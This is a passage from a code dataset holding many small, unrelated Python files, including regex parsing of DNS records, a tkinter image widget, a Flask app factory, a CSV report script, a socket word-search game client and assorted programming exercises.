re.compile('.*(?:vlan|vl)(\\d{2,4}).*(?:vrrp|hsrp)?.*')\n vrrp_re = re.compile('.*-old-(?:vlan|vl)(\\d{2,4}).*(?:vrrp|hsrp)?.*')\n for item in dns_records:\n is_vlan = re.match('.*(vlan|vl)(\\d{2,4}).*\\..*',item['name'].lower())\n is_vrrp = re.match('.*-old-(vlan|vl)(\\d{2,4}).*(vrrp|hsrp).*',item['name'].lower())\n if is_vlan:\n # check if vrrp and hsrp in name, check on better logic later\n if 'vrrp' in item['name'].lower() or 'hsrp' in item['name'].lower():\n pass\n elif is_vlan.group(2) in vlans.keys():\n subnet = vlan_ips[is_vlan.group(2)][1]\n vrrp[is_vlan.group(2)] = {'ip': '', 'vrrp': ''}\n vrrp[is_vlan.group(2)]['ip'] = \"{}/{}\".format(item['address'],subnet)\n if is_vrrp:\n if is_vrrp.group(2) in vlans.keys():\n subnet = vlan_ips[is_vrrp.group(2)][1]\n vrrp[is_vrrp.group(2)]['vrrp'] = \"{}/{}\".format(item['address'],subnet)\n return vrrp\n\ndef extract_vrrp_address(dnsrecord):\n is_vrrp = re.match('.*-old-(vlan|vl)(\\d{2,4}).*(vrrp|hsrp).*', dnsrecord.lower())\n\n","sub_path":"network-robot/mainapp/make_config.py","file_name":"make_config.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"17642162","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 2 17:39:07 2017\n\n@author: blindness\n\nconvert decimal to hexadecimal \n\"\"\"\n\ndef to_string(n, base):\n convert_string = \"0123456789ABCDEF\"\n if(n < base):\n return convert_string[n]\n else:\n return to_string(n/base,base) + convert_string[n % base]\n \nprint(to_string(2835,16)) ","sub_path":"dec_to_hex.py","file_name":"dec_to_hex.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"462112264","text":"import tkinter as tk\nfrom PIL import ImageTk\n\nfrom controller import images as controller\nfrom controller import pieces as pieces_controller\n\n\nclass ImageList(tk.LabelFrame):\n def _repack(self):\n for k, v in self.but_ids.items():\n self.images_list.delete(v)\n\n i = 1\n for k, but in self.image_buts.items():\n self.images_list.create_window(i*120, 100, window=but, width=120, height=120)\n i += 1\n\n self.images_list.configure(scrollregion=self.images_list.bbox('all'), xscrollcommand=self.scrollbar.set)\n\n def __init__(self, master):\n tk.LabelFrame.__init__(self, master, text='Images', height=250)\n\n self.button_frame = tk.Frame(self)\n self.add_but = tk.Button(self.button_frame, text='Add to Frame', command=pieces_controller.add_from_image)\n self.import_but = tk.Button(\n self.button_frame, text='Import', command=controller.import_image, background='#ff5555'\n )\n self.import_sp_but = tk.Button(\n self.button_frame, text='Import Spritesheet', command=controller.import_spritesheet_open, background='#22ff22'\n )\n self.delete_but = tk.Button(self.button_frame, text='Delete', command=controller.delete_image)\n self.vert_but = tk.Button(self.button_frame, text='Clone via Vertical Flip', command=controller.clone_vertical)\n self.hori_but = tk.Button(\n self.button_frame, text='Clone via Horizontal Flip', command=controller.clone_horizontal\n )\n self.add_but.grid(row=0, column=0, pady=5, padx=3)\n self.import_but.grid(row=0, column=1, pady=5, padx=3)\n self.import_sp_but.grid(row=0, column=2, pady=5, padx=3)\n self.delete_but.grid(row=0, column=3, pady=5, padx=3)\n self.vert_but.grid(row=0, column=4, pady=5, padx=3)\n self.hori_but.grid(row=0, column=5, pady=5, padx=3)\n self.button_frame.pack(side='top')\n\n self.list_frame = tk.Frame(self)\n self.images_list = tk.Canvas(self.list_frame)\n self.scrollbar = tk.Scrollbar(self.list_frame, orient='horizontal', command=self.images_list.xview)\n\n self.selected_image = tk.IntVar()\n self.tk_images = {} # image_id -> PhotoImage\n self.image_buts = {} # image_id -> RadioButton\n self.but_ids = {} # image_id -> canvas id\n\n self.images_list.pack(fill='both', expand=True, side='top')\n self.scrollbar.pack(fill='both', expand=True, side='bottom')\n self.list_frame.pack(fill='both', expand=True, side='bottom')\n\n self.grid(row=1, column=0, sticky=tk.W+tk.E)\n\n def get_selected_image(self):\n return self.selected_image.get()\n\n def add_image(self, image_id, img):\n self.tk_images[image_id] = ImageTk.PhotoImage(img.resize((100, 100)))\n img = self.tk_images[image_id]\n self.image_buts[image_id] = tk.Radiobutton(self, image=img, value=image_id, variable=self.selected_image)\n self.but_ids[image_id] = self.images_list.create_window(\n len(self.image_buts)*120,\n 100,\n window=self.image_buts[image_id],\n width=120,\n height=120\n )\n self.images_list.configure(scrollregion=self.images_list.bbox('all'), xscrollcommand=self.scrollbar.set)\n\n def remove_image(self, image_id):\n canvas_id = self.but_ids[image_id]\n self.images_list.delete(canvas_id)\n del self.but_ids[image_id]\n del self.image_buts[image_id]\n del self.tk_images[image_id]\n self._repack()\n\n def clear(self):\n for k, v in self.but_ids.items():\n self.images_list.delete(v)\n self.but_ids = {}\n self.tk_images = {}\n self.image_buts = {}\n","sub_path":"view/images_list.py","file_name":"images_list.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"491733","text":"# Author: Kartik Sah\n# Year: 2018\n# Topic: Decorators\n# Decorators are a way to dynamically alter the functionality of your functions.\n\ndef decorator_func(use_func):\n import logging\n import time\n\n logging.basicConfig(filename='{}.log'.format(use_func.__name__), level = logging.INFO)\n\n def wrapper_func(*args,**kwargs):\n time_start = time.time()\n result = use_func(*args)\n for i in range(100000):\n a = 0\n time_end = time.time()\n delta_time = time_end - time_start\n logging.info('Ran with args: {} and kwargs: {}, time taken to complete: {delta_time:.2f} seconds'.format(args,kwargs,delta_time))\n return result\n\n\n return wrapper_func\n\n@decorator_func\ndef check_func(name):\n return 'My name is ' + name\n\n# check_func = decorator_func(check_func) -- is equivalent to @decorator_func\n# check_func() now calls the wrapper_func, which takes 'Kartik' as an argument\n\nprint(check_func('Kartik'))\n","sub_path":"Decorators/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"134705600","text":"#! ../env/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Benjamin Apra'\n__email__ = 'bapra@twistbioscience.com'\n__version__ = '1.0'\n\nfrom flask import Flask\nfrom webassets.loaders import PythonLoader as PythonAssetsLoader\nfrom flask_restful import Api\nfrom tasks import *\n\nfrom bioseqscreen.controllers.main import main\nfrom bioseqscreen import assets\nfrom bioseqscreen.models import db\nfrom bioseqscreen.extensions import (\n admin,\n cache,\n assets_env,\n debug_toolbar,\n login_manager\n)\nfrom bioseqscreen.rest import add_routes\n\nimport sys, os\nsys.path.append(os.path.abspath(\"../..\"))\n\ndef create_app(object_name):\n \"\"\"\n An flask application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n Arguments:\n object_name: the python path of the config object,\n e.g. bioseqscreen.settings.ProdConfig\n\n env: The name of the current environment, e.g. prod or dev\n \"\"\"\n\n app = Flask(__name__)\n\n app.config.from_object(object_name)\n\n # initialize the cache\n cache.init_app(app)\n\n # initialize the debug tool bar\n debug_toolbar.init_app(app)\n\n # initialize SQLAlchemy\n db.init_app(app)\n if not os.path.exists(os.path.join(os.getcwd(), 'database.sqlite')):\n with app.app_context():\n db.create_all()\n\n login_manager.init_app(app)\n\n # Import and register the different asset bundles\n assets_env.init_app(app)\n assets_loader = PythonAssetsLoader(assets)\n for name, bundle in assets_loader.load_bundles().items():\n assets_env.register(name, bundle)\n\n # register our blueprints\n app.register_blueprint(main)\n\n admin.init_app(app)\n\n api = Api(app)\n add_routes(api)\n\n return app\n\nenv = os.environ.get('BIOSEQSCREEN_ENV', 'dev')\napp = create_app('bioseqscreen.settings.%sConfig' % env.capitalize())\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"499948755","text":"class Solution:\n # @param n: an integer\n # @return an integer f(n)\n def fibonacci(self, n):\n # write your code here\n fib=[0]*n\n \n if n==1:\n fib[0]=0\n elif n==2:\n fib[1]=1\n else:\n fib[0],fib[1]=0,1\n for i in range(2,n):\n fib[i]=fib[i-1]+fib[i-2]\n \n return fib[n-1]\n","sub_path":"Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"642019582","text":"a = int(input())\nb = int(input())\n\ns = 0\nm = 999999\nfor i in range(1, 101):\n if i**2 >= a and i**2 <= b:\n s += i**2\n if m > i**2: m = i**2\n\nif s > 0:\n print(s)\n print(m)\nelse:\n print(-1)\n","sub_path":"01000/01977/1977.py3.py","file_name":"1977.py3.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"95099369","text":"import re\n\nclass Point:\n def __init__(self, x, y, dx, dy):\n self.x = x\n self.y = y\n self.dx = dx\n self.dy = dy\n def update(self):\n self.x += self.dx\n self.y += self.dy\n def __str__(self):\n return str(self.x)+','+str(self.y)+';'+str(self.dx)+','+str(self.dy)\n\ndef read_points():\n with open('../input/day10.txt') as f:\n lines = f.readlines()\n prog = re.compile(r'position=<(\\s*\\-?\\d+),(\\s*\\-?\\d+)> velocity=<(\\s*\\-?\\d+),(\\s*\\-?\\d+)>')\n points = []\n for line in lines:\n match = prog.search(line)\n groups = match.groups()\n points.append(Point(int(groups[0]), int(groups[1]), int(groups[2]), int(groups[3])))\n return points\n\ndef print_points(points):\n min_x = float('inf')\n max_x = float('-inf')\n min_y = float('inf')\n max_y = float('-inf')\n for p in points:\n if p.x < min_x:\n min_x = p.x\n if p.x > max_x:\n max_x = p.x\n if p.y < min_y:\n min_y = p.y\n if p.y > max_y:\n max_y = p.y\n if max_y - min_y > 10:\n return [['.']]\n center_x = -1 * min_x\n center_y = -1 * min_y\n matrix = [['.' for i in range(min_x, max_x+1)] for j in range(min_y, max_y+1)]\n for p in points:\n i = center_x + p.x\n j = center_y + p.y\n matrix[j][i] = '#'\n return matrix\n\npoints = read_points()\nsecond_count = 500000\nf = open('results.txt','w')\nfor i in range(second_count):\n matrix = print_points(points)\n if len(matrix) > 1:\n f.write('After '+str(i)+' seconds\\n')\n for r in matrix:\n f.write(''.join(r)+'\\n')\n for p in points:\n p.update()\nf.close()","sub_path":"day10/day10-1.py","file_name":"day10-1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"351585117","text":"import requests\nimport json\n\nURL = \"http://127.0.0.1:8000/\"\n\n\ndef readData(id=None):\n data = {}\n if id is not None:\n data = {'id': id}\n json_data = json.dumps(data)\n res = requests.get(url=URL, data=json_data)\n print(res.json())\n\n\n# readData(2)\n\ndef createData():\n data = {\n 'name': 'Ajay Kabira',\n 'roll': 344,\n 'section': 'Business',\n 'age': 37\n }\n json_data = json.dumps(data)\n res = requests.post(url=URL, data=json_data)\n print(res.json())\n\n\n# createData()\n\ndef partialUpdate():\n data = {\n 'id': 3,\n 'name': 'Kamal Kumar',\n 'age': 40\n }\n json_data = json.dumps(data)\n res = requests.put(url=URL, data=json_data)\n print(res.json())\n\n\n# partialUpdate()\n\ndef deleteData(id):\n data = {'id': id}\n json_data = json.dumps(data)\n res = requests.delete(url=URL, data=json_data)\n print(res.json())\n\n\ndeleteData(3)\n","sub_path":"3_DjangoCRUDAPIFunctionBased/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"570359351","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFile: heap_sort_big_files.py\nAuthor: Hong-Wei Ng\nEmail: lightalchemist@gmail.com\nGithub: https://github.com/lightalchemist\nDescription: Qn 10.1 on pg 80 from Elements of Programming Interviews.\n\nGiven a number of files which contain lines of the form , ...\neach sorted by timestamps,\ncombine the contents of all these files into a file sorted by the timestamps.\n\nThe individual files are of the order 5-100 MB and there may be many files.\nDesign an algorithm to perform the task that use very little RAM, ideally of\nthe order of a few KB.\n\n\"\"\"\n\nfrom heapq import heapify\nfrom heapq import heappush\nfrom heapq import heappop\n\n\ndef insert_line(heap, infile, fid):\n line = infile.readline()\n if line:\n timestamp = int(line.split(',')[0])\n heappush(heap, (timestamp, line, fid))\n\n\ndef sort(filenames, outfilename):\n with open(outfilename, 'w') as outfile:\n heap = []\n infiles = [open(f) for f in filenames]\n # Populate heap\n for i, infile in enumerate(infiles):\n insert_line(heap, infile, i)\n\n heapify(heap)\n\n while heap:\n timestamp, line, fid = heappop(heap)\n outfile.write(line)\n insert_line(heap, infiles[fid], fid) # Replace line from file with another line from same file\n\n # Close all files\n for infile in infiles:\n infile.close()\n\n\ndef test():\n filenames = [\"file1.txt\", \"file2.txt\", \"file3.txt\"]\n outfilename = \"sorted_lines.txt\"\n sort(filenames, outfilename)\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"algorithms/general/heap_sort_big_files.py","file_name":"heap_sort_big_files.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"541292972","text":"\"\"\"\n1. Задание на закрепление знаний по модулю CSV. Написать скрипт,\nосуществляющий выборку определенных данных из файлов info_1.txt, info_2.txt,\ninfo_3.txt и формирующий новый «отчетный» файл в формате CSV.\n\nДля этого:\n\nСоздать функцию get_data(), в которой в цикле осуществляется перебор файлов\nс данными, их открытие и считывание данных. В этой функции из считанных данных\nнеобходимо с помощью регулярных выражений извлечь значения параметров\n«Изготовитель системы», «Название ОС», «Код продукта», «Тип системы».\nЗначения каждого параметра поместить в соответствующий список. Должно\nполучиться четыре списка — например, os_prod_list, os_name_list,\nos_code_list, os_type_list. В этой же функции создать главный список\nдля хранения данных отчета — например, main_data — и поместить в него\nназвания столбцов отчета в виде списка: «Изготовитель системы»,\n«Название ОС», «Код продукта», «Тип системы». Значения для этих\nстолбцов также оформить в виде списка и поместить в файл main_data\n(также для каждого файла);\n\nСоздать функцию write_to_csv(), в которую передавать ссылку на CSV-файл.\nВ этой функции реализовать получение данных через вызов функции get_data(),\nа также сохранение подготовленных данных в соответствующий CSV-файл;\n\nПример того, что должно получиться:\n\nИзготовитель системы,Название ОС,Код продукта,Тип системы\n\n1,LENOVO,Windows 7,00971-OEM-1982661-00231,x64-based\n\n2,ACER,Windows 10,00971-OEM-1982661-00231,x64-based\n\n3,DELL,Windows 8.1,00971-OEM-1982661-00231,x86-based\n\nОбязательно проверьте, что у вас получается примерно то же самое.\n\nПРОШУ ВАС НЕ УДАЛЯТЬ СЛУЖЕБНЫЕ ФАЙЛЫ TXT И ИТОГОВЫЙ ФАЙЛ CSV!!!\n\"\"\"\nimport csv\nimport re\n# import chardet\n\nHEADER = [\"Изготовитель системы\", \"Название ОС\", \"Код продукта\", \"Тип системы\"]\nFILES = ['info_1.txt', 'info_2.txt', 'info_3.txt']\n\n\ndef task_1():\n \"\"\"function creating dict for write and get data\"\"\"\n os_prod_list = list()\n os_name_list = list()\n os_code_list = list()\n os_type_list = list()\n main_data = [HEADER]\n looking_for = [r'Изготовитель системы:\\s', r'Название ОС:\\s',\n r'Код продукта:\\s', r'Тип системы:\\s']\n for file in FILES:\n with open(file, 'rb') as tmp_f:\n for line in tmp_f.readlines():\n # с поиском кодировки не заполняется файл\n # encoding = chardet.detect(line)\n # print(encoding)\n # line = bytes.decode(line, encoding=encoding['encoding']).\\\n # encode('utf-8').decode('utf-8')\n # при тестировании не забыть импортировать chardet\n line = bytes.decode(line, encoding='cp1251'). \\\n encode('utf-8').decode('utf-8')\n for counter, reg_ex in enumerate(looking_for):\n found_string = re.search(reg_ex, line)\n if found_string is not None and counter == 0:\n found_string = re.split(r'\\W{2,}', line)\n os_prod_list.append(found_string[1])\n if found_string is not None and counter == 1:\n found_string = re.split(r'\\W{2,}', line)\n os_name_list.append(found_string[1])\n if found_string is not None and counter == 2:\n found_string = re.split(r'\\W{2,}', line)\n os_code_list.append(found_string[1])\n if found_string is not None and counter == 3:\n found_string = re.split(r'\\W{2,}', line)\n os_type_list.append(found_string[1])\n for counter in range(len(os_prod_list)):\n tmp_list = [os_prod_list[counter], os_name_list[counter],\n os_code_list[counter], os_type_list[counter]]\n main_data.append(tmp_list)\n return main_data\n\n\ndef task_1_launcher(file_obj):\n \"\"\"Function to save dict in file csv format\"\"\"\n with open(file_obj, 'w', encoding='utf-8') as f_writer:\n f_writer = csv.writer(f_writer, quoting=csv.QUOTE_ALL)\n for row in task_1():\n f_writer.writerow(row)\n\n\ntask_1_launcher('main_data.csv')\nprint('Программа выполнена')\n","sub_path":"lesson_2/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"151783430","text":"import socket\nimport json\nfrom time import time\nfrom colorama import init\nfrom termcolor import colored\nimport os\n\ninit(autoreset=True)\n\n# Creando un socket TCP/IP\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# Conecta el socket en el puerto cuando el servidor esté escuchando\nserver_address = ('localhost', 3000)\nprint('conectando a %s puerto %s' % server_address)\nsock.connect(server_address)\n\ndef verify_cordinates(coordenada, solucion):\n cordinate = []\n for x in coordenada:\n if x.isdigit():\n cordinate.append(int(x))\n else:\n return '', False\n for key in solucion:\n if cordinate == solucion[key]:\n return key, True\n return '', False\n\ntry:\n os.system(\"cls\")\n # Enviando datos\n message = b' '\n sock.sendall(message)\n # Buscando respuesta\n while True:\n # Recibimos los datos para jugar\n topic = sock.recv(128)\n tablero = sock.recv(2048).decode()\n solve = json.loads(sock.recv(1024).decode())\n # definimos la listas de solucion\n words = []\n words_finder = []\n for key in solve:\n words.append(key)\n\n # jugamos hasta que no queden palabras en cola\n time_s = time()\n while words:\n os.system(\"cls\")\n # imprimimos el topico de la sopa de letras\n print('\\n\\t TOPICO >>> ', colored(topic.decode(\"utf-8\").upper(), 'green'), '\\n')\n # dibujamos el tablero recibido\n print(tablero)\n # mostramos palabras a encontrar\n print('PODRAS ENCONTRAR ESTAS PALABRAS CRACK?...')\n for i in words:\n print(colored(i, 'blue'), end=' ')\n # mostramos las palabras que hemos encontrado\n print('\\n\\nPALABRAS ENCONTRADAS CRACK...')\n if not words_finder:\n print(colored('Nada aun capo, piensa esponja, piensa...', 'cyan'), end='\\t')\n else:\n for i in words_finder:\n print(colored(i, 'cyan'), end=' ')\n # preguntas por las coordenadas\n print('\\n\\nintroduce las cordenadas de la primera y ultima letra de la palabra, por espacios')\n print('ejemplo : 1 2 3 4')\n word_try = list(input('algunas cordenadas crack? >>> ').split())\n # comprobamos si las cordenadas son validas\n llave, resultado = verify_cordinates(word_try, solve)\n if resultado:\n words_finder.append(llave)\n words.remove(llave)\n else:\n pause = input(colored('\\nUy no capo, si ves bien o te presto mis lestes?...', 'red'))\n\n # cuando el juego finalize enviamos el tiempo que le tomo al jugador\n time_f = time()\n sock.sendall(bytes(str(time_f-time_s), encoding='utf-8'))\n\n print(colored('\\n\\nGRANDEEE!!! TU NOMBRE SERA RECORDADO POR LAS GENERACIONES!...', 'red'))\nexcept:\n print('')\n\nfinally:\n print('cerrando socket...')\n sock.close()","sub_path":"practica_2_/sdl_clt.py","file_name":"sdl_clt.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"86384734","text":"a = [\"banana\", \"apple\",\"microsoft\"]\n\nfor element in a :\n\tprint(element)\n\n\nb = [1,3,4,5,6,6,7,7,8]\ntotal = 0\nfor e in b:\n\tprint(e)\n\ttotal = total + e\n\tprint(total)\n\n#range(1, 5)\nc = list(range(1, 5))\nprint(c)\n\ntotal2 = 0\nfor d in range(1, 5):\n\ttotal2 += d\n\tprint(total2)\n\nprint(list(range(1, 8)))\ntotal3 = 0\nfor i in range(1, 8):\n\tif i % 3 == 0 :\n\t\ttotal3 += i\n\t\tprint(total3)\n\n\n","sub_path":"loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"128844361","text":"#!/usr/bin/env python3\n\nimport rospy\nimport math\nfrom gazebo_msgs.msg import ModelState, ModelStates\nfrom geometry_msgs.msg import Point, Pose, Quaternion, Twist, Vector3\nfrom q_learning_project.msg import QLearningReward\nfrom std_msgs.msg import Header\nfrom numpy import genfromtxt\nfrom queue import Queue\n\nfrom random import shuffle\nfrom tf.transformations import quaternion_from_euler, euler_from_quaternion\n\nRED = \"redghost\"\nPACTURTLE = \"pacturtle\"\nMAP_WIDTH = 9\nMAP_HEIGHT = 11\nPAC_CELL = 0\nRED_CELL = 0\n\nclass RedTurtle(object):\n def __init__(self):\n\n # initialize this node\n rospy.init_node('final_project_red_turtle')\n\n # initial prep for BFS algorithm\n self.unpack_adjMatrix()\n self.create_adjLists()\n self.init_bfs_entities()\n\n # save initial positions\n self.init_pos = {}\n self.init_pos[PACTURTLE] = Point(x=2, y=5, z=0)\n self.init_pos[RED] = Point(x=0.5, y=0.5, z=0)\n\n self.PAC_CELL = 0\n self.RED_CELL = 0\n # Initially stationary (not moving forward)\n self.forward = False\n\n # Subscribe to model states\n rospy.Subscriber(\"/gazebo/model_states\", ModelStates,\n self.turtle_hunter)\n\n # Command Vel pub\n self.command_pub = rospy.Publisher(\"/redghost/cmd_vel\", Twist, queue_size=10)\n\n rospy.sleep(1)\n\n self.run()\n\n # Unpack the adjaceny matrix text file into an array\n # Note the generated matrix has one too many values -- the newline\n # char is treated as a -1. Will ignore this when working with adj matrix\n # (we do not use negative values in our matrix)\n def unpack_adjMatrix(self):\n self.matrix = genfromtxt(\"../map/Pacturtle_v2/map.txt\", dtype=int, comments=\"#\",\n delimiter=\",\", autostrip = True, unpack=False)\n\n # Uses unpacked adjaceny matrix to create a list of adjancent cells for each cell.\n # Packaged into a single dictionary\n def create_adjLists(self):\n self.adjLists = {}\n for node in range(0, 99):\n adjacent = []\n for pos_adj in range(0, 99):\n # Checks adjacent matrix to see if pos_adj is a valid adjancent cell\n if self.matrix[node][pos_adj] == 1:\n adjacent.append(pos_adj)\n self.adjLists[node] = adjacent\n\n # Helper function from previous project\n def get_yaw_from_pose(self, p):\n \"\"\" A helper function that takes in a Pose object (geometry_msgs) and returns yaw\"\"\"\n\n yaw = (euler_from_quaternion([\n p.orientation.x,\n p.orientation.y,\n p.orientation.z,\n p.orientation.w])\n [2])\n\n return yaw\n\n # BFS implementation, Source: PyVision Youtube Video\n def init_bfs_entities(self):\n self.parentList = {}\n for source in range(0, 99):\n # Create and initialize required vars to \"empty\" position\n visited = {}\n dist = {}\n parent = {}\n traversal = []\n queue = Queue()\n for node in self.adjLists.keys():\n visited[node] = False\n parent[node] = None\n dist[node] = -1\n\n # Begin BFS\n visited[source] = True\n dist[source] = 0\n queue.put(source)\n\n while not queue.empty():\n u = queue.get()\n traversal.append(u)\n\n for v in self.adjLists[u]:\n if not visited[v]:\n visited[v] = True\n parent[v] = u\n dist[v] = dist[u] + 1\n queue.put(v)\n self.parentList[source] = parent\n\n # BFS is complete at this point\n # Use BFS entities to determine shortest path\n def shortest_path(self, source, end):\n path = []\n parent = self.parentList[source]\n while end is not None:\n path.append(end)\n end = parent[end]\n path.reverse()\n self.shortestPath = path\n\n # Executes linear and angular movements\n def move(self):\n # Find the next cell to traverse to\n # Required step since, depending on exact coordinates, shortestPath\n # may or many not include cell the bot is currently in (if it does, need to\n # ignore current cell and take the next one)\n target_cell = 0\n for next_cell in self.shortestPath:\n if self.RED_CELL != next_cell:\n target_cell = next_cell\n break\n # Determine direction of target cell relative to current cell\n # Below 2 are conditions for moving along the x axis\n # If target cell is to the left:\n if target_cell == self.RED_CELL - 1:\n target_yaw = 3.1415\n # If target cell is to the right:\n elif target_cell == self.RED_CELL + 1:\n target_yaw = 0\n # Below 2 are conditions of moving along the y axis\n # If target cell is to the top:\n elif target_cell == self.RED_CELL + MAP_WIDTH:\n target_yaw = 1.5708\n # If target cell is to the bottom:\n else:\n target_yaw = -1.5708\n\n yaw_error = 0.1\n current_yaw = self.get_yaw_from_pose(self.POSE)\n # Check for edge cases when yaw goes from positive to negative (ie. around 0,\n # transition from 3.14 to -3.14). If so, use additional rules to check for error margin\n # or negative numbers\n turning = False\n if target_yaw == 3.1415 or target_yaw == 0:\n if current_yaw > 0:\n if current_yaw > target_yaw + yaw_error or current_yaw < target_yaw - yaw_error:\n turning = True\n else:\n if current_yaw > -1*(target_yaw) + yaw_error or current_yaw < -1*(target_yaw) - yaw_error:\n turning = True\n else:\n if current_yaw > target_yaw + yaw_error or current_yaw < target_yaw - yaw_error:\n turning = True\n else:\n turning = False\n # Still need to turn, don't move forward yet\n if turning:\n self.forward = False\n command = Twist()\n\n # Check for cases where moving clockwise is better than the default\n # counter clockwise\n if target_yaw == 0 and current_yaw > 0:\n command.angular.z = -0.7\n elif target_yaw == 3.1415 and current_yaw < 0:\n command.angular.z = -0.7\n elif target_yaw == -1.5708 and current_yaw < 1.5708 and current_yaw > -1.5708:\n command.angular.z = -0.7\n else:\n command.angular.z = 0.5\n\n self.command_pub.publish(command)\n\n # Turning has completed, can begin moving forward\n else:\n self.forward = True\n error = 0.1\n command = Twist()\n x_midpoint = self.find_midpoint(target_cell, \"x\")\n y_midpoint = self.find_midpoint(target_cell, \"y\")\n\n # Robot is moving along the x axis, check if it has reached midpoint of next cell\n if target_yaw == 0 or target_yaw == 3.1415:\n axis = 'x'\n if x_midpoint - error < self.RED_POS.x and x_midpoint + error > self.RED_POS.x:\n self.forward = False\n print('stop forward x ' + str(self.RED_POS.x))\n # Robot is moving along the y axis, check if it has reached midpoint of next cell\n else:\n if y_midpoint - error < self.RED_POS.y and y_midpoint + error > self.RED_POS.y:\n self.forward = False\n print('stop forward y ' + str(self.RED_POS.y))\n\n if not self.forward:\n print('stop moving forward')\n command.linear.x = 0\n self.command_pub.publish(command)\n rospy.sleep(1)\n else:\n command.linear.x = 0.3\n self.command_pub.publish(command)\n\n # Determines the coordinate value of the midpoint of a cell for the specificed axis\n # Add 0.5 to get the midpoint of the cell\n def find_midpoint(self, cell, axis):\n if axis==\"x\":\n return cell%MAP_WIDTH + 0.5\n else:\n return math.floor(cell/MAP_WIDTH) + 0.5\n\n # Helper function that translates a point into a cell location\n # on the map (map designed so that each cell is 1m x 1m)\n def determine_cell(self, position : Point):\n column = math.floor(position.x)\n row = math.floor(position.y)\n cell = MAP_WIDTH * row + column\n return cell\n\n # Callback function that extracts ModelState data and calls move() command\n def turtle_hunter(self, data: ModelState):\n # Extract Location of Red Turtle and Pacturtle\n pacturtle_data = Pose()\n pacturtle_cell = 0\n redturtle_data = Pose()\n redturtle_cell = 0\n for turtle in self.init_pos.keys():\n index = data.name.index(turtle)\n if turtle == PACTURTLE:\n pacturtle_data = data.pose[index]\n pacturtle_cell = self.determine_cell(pacturtle_data.position)\n else:\n redturtle_data = data.pose[index]\n redturtle_cell = self.determine_cell(redturtle_data.position)\n self.RED_POS = redturtle_data.position\n self.POSE = redturtle_data\n # Bot at midpoint, calculate new shortest path from current cell\n if not self.forward:\n self.RED_CELL = redturtle_cell\n self.PAC_CELL = pacturtle_cell\n self.shortest_path(self.RED_CELL, self.PAC_CELL)\n self.move()\n # Still moving forward, do not bother it until reaches midpoint of target cell\n else:\n self.move()\n return\n\n def run(self):\n rospy.spin()\n\nif __name__ == \"__main__\":\n node = RedTurtle()\n","sub_path":"scripts/red_turtle.py","file_name":"red_turtle.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"230872488","text":"'''\r\nCreated on 2019年3月4日\r\n\r\n@author: Le\r\n'''\r\nfrom selenium import webdriver\r\n\r\ndriver = r\"D:\\Program files\\chromedriver.exe\"\r\nd = webdriver.Chrome(executable_path=driver)\r\nd.get('https://www.taobao.com/')\r\nprint(d.page_source)","sub_path":"spider/selenium1.py","file_name":"selenium1.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"557498694","text":"import collections\nimport fileinput\n\n#-----------------------------------------------------------------\n#--------- REAL TIME INPUT VS. FILE INPUT SETTINGS --------------\n# REALTIMEinput = True: Shell waits for user to input next command\n# REALTIMEinput = False: Shell takes in file input and shuts down after processing each line. \n\nREALTIMEinput = False\n#-----------------------------------------------------------------\n# ------ REAL TIME INPUT VS. FILE INPUT SETTINGS END ----------\n#-----------------------------------------------------------------\n\n\n#-----------------------------------------------\n# ------ OUTPUT/PRINT SETTINGS START ----------\n# DEBUG = True: All logs will be shown. \n# DEBUG = False: Only relevant output is shown.\n# ------------------------------------------------\nDEBUG = False\n\ndef log(s):\n '''Used for debugging.'''\n if DEBUG:\n print(s)\n\ndef display(s):\n '''Used for running.'''\n if DEBUG == False:\n print(s, end =\" \")\n#-----------------------------------------------\n# ------ OUTPUT/PRINT SETTINGS END ----------\n#-----------------------------------------------\n\n\n#--------------------------------------------------------\n# ------ FILE INPUT SETTINGS START ----------------------\n# TESTRUN = True: Input file is specified below in the var filepath.\n# TESTRUN = False: Input file is input.txt by default.\nTESTRUN = False\nfilepath = 'io/in_1' # 